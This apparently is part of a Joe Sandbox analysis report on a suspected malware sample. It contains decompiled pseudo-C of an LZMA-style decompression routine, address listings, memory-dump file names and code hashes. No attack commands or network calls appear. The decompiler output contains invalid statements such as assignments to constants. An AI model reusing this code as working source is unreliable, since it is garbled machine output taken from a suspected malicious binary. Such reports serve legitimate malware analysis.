													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                  0x00406481
                  0x00406481
                  0x00406481
                  0x00406481
                  0x00406487
                  0x0040648b
                  0x0040648f
                  0x00406499
                  0x004064a7
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00000000
                  0x00000000
                  0x004067ba
                  0x004067c3
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x00406811
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406813
                  0x00406813
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x004068c8
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x00406796
                  0x0040679c
                  0x004067a3
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x00000000
                  0x004067ae
                  0x00406818
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00406734
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00405edf
                  0x00000000
                  0x00405ee6
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef0
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4b
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f95
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fbf
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x00406005
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406713
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x00000000
                  0x004060d9
                  0x00406053
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00406688
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x0040678a
                  0x00406745
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00000000
                  0x0040646a
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x0040678a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004064af
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x00406548
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004067b4
                  0x0040677d

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                  • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                  • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                  • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406682 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
